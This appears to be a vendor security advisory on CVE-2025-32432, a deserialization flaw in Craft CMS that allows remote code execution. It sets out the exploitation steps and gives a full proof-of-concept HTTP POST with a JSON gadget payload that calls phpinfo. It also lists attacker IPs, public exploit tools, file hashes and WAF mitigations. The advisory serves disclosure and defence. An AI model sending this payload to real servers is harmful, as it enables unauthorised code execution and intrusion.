CVE-2025-32432: Deserialization in Craft CMS Allows RCE
Introduction
Identified on April 7, 2025, and officially published on April 25, 2025, in the NVD, CVE-2025-32432 presents a critical threat to organizations using Craft CMS, a widely adopted content management system. This flaw allows unauthenticated remote code execution (RCE), enabling attackers to run arbitrary commands on the server, compromising data security and system integrity. It is estimated that around 13,000 Craft CMS instances are vulnerable, with at least 300 already compromised. Patches were made available on April 10, 2025, but active exploitation has been detected since April 17, making an immediate response essential.
Affected Versions
The vulnerability affects the following versions of Craft CMS:
| Version | Affected Range |
|---|---|
| Craft CMS 3.x | 3.0.0-RC1 to 3.9.14 |
| Craft CMS 4.x | 4.0.0-RC1 to 4.14.14 |
| Craft CMS 5.x | 5.0.0-RC1 to 5.6.16 |
Technical Details
CVE-2025-32432 is an insecure deserialization vulnerability that results in remote code execution (RCE). It is related to a flaw in the Yii framework (CVE-2024-58136), fixed in version 2.0.52, but which required specific fixes in Craft CMS. The exploitation occurs at the actions/assets/generate-transform endpoint, where a malicious POST request can deserialize a manipulated PHP object, allowing the execution of arbitrary code.
Exploitation Process
To exploit the flaw, a malicious actor can follow these steps:
Obtaining a Valid CSRF Token: Before exploring the vulnerable endpoint, the attacker needs to obtain the required CSRF token for the next request. For this, a basic request to the
/index.php?p=admin/dashboardendpoint can be performed to capture the CSRF token.Sending the Malicious Payload: With a valid CSRF token, the attacker sends a POST request to the same endpoint with a payload that exploits deserialization. A simplified example of this payload would be:
{
"assetId": 11,
"handle": {
"width": 123,
"height": 123,
"as session": {
"class": "craft\\behaviors\\FieldLayoutBehavior",
"__class": "GuzzleHttp\\Psr7\\FnStream",
"__construct()": [[]],
"_fn_close": "phpinfo"
}
}
}
This payload causes the server to execute the phpinfo() function, demonstrating the ability to execute code. In real scenarios, attackers can use more complex payloads to install backdoors or extract data.
The full POST request would look something like this:
POST /index.php?p=admin/actions/assets/generate-transform HTTP/1.1
Host: <hostname>
Accept-Encoding: gzip, deflate, br
X-CSRF-Token: <token>
Content-Type: application/json
{
"assetId": 11,
"handle": {
"width": 123,
"height": 123,
"as session": {
"class": "craft\\behaviors\\FieldLayoutBehavior",
"__class": "GuzzleHttp\\Psr7\\FnStream",
"__construct()": [[]],
"_fn_close": "phpinfo"
}
}
}
- Advanced Exploitation: After the initial execution, attackers can upload malicious PHP files, such as
filemanager.php, to maintain persistent access. This was observed in campaigns that used specific IPs, such as 172.86.113.137 and 104.161.32.11, to distribute malware.
Public Tools and Exploits
Tools that automate exploitation exist and are available in repositories such as:
Chocapikk/CVE-2025-32432: A vulnerability checker for Craft CMS.
Sachinart/CVE-2025-32432: A Python script that automates detection and exploitation, including system information extraction.
Additionally, a Metasploit module was published, lowering the barrier for less experienced attackers. SensePost also made a Nuclei template available for detection in versions 4.x and 5.x.
Evidence of Exploitation
Real world exploitation was confirmed on April 17, 2025, with campaigns installing files such as filemanager.php (MD5: d8fddbd85e6af76c91bfa17118dbecc6) and others, like autoload_classmap.php and wp-22.php. SensePost identified approximately 35,000 domains hosting Craft CMS, of which 13,000 were vulnerable, mostly in the United States.
Mitigations
Official Patch
The definitive solution is to update Craft CMS to the patched versions, released on April 10, 2025:
Temporary Measures
If an immediate update is not possible, the following actions can reduce the risk:
Firewall Blocking: Configure the firewall to block POST requests to the
actions/assets/generate-transformendpoint containing the__classstring in the body. This can be implemented in tools such as WAFs (Web Application Firewalls).Security Library: Install the Craft CMS Security Patches as a temporary solution.
Log Monitoring: Check server logs for suspicious requests to the mentioned endpoint, especially those with
__class.
Conclusion
The CVE-2025-32432 vulnerability is a critical threat that exposes Craft CMS systems to severe attacks, including data theft and malware installation. Its active exploitation and the availability of public tools, such as Python scripts and Metasploit modules, increase the urgency for action. Organizations should prioritize updating to the corrected versions and implement temporary mitigation measures if necessary. A rapid response to this flaw is essential to protect digital infrastructure.
If you want to test your systems' security in a practical and effective way, we invite you to host a hacking tournament at Bypassec, a platform with more than 100 ethical hackers ready to identify vulnerabilities in your environment.
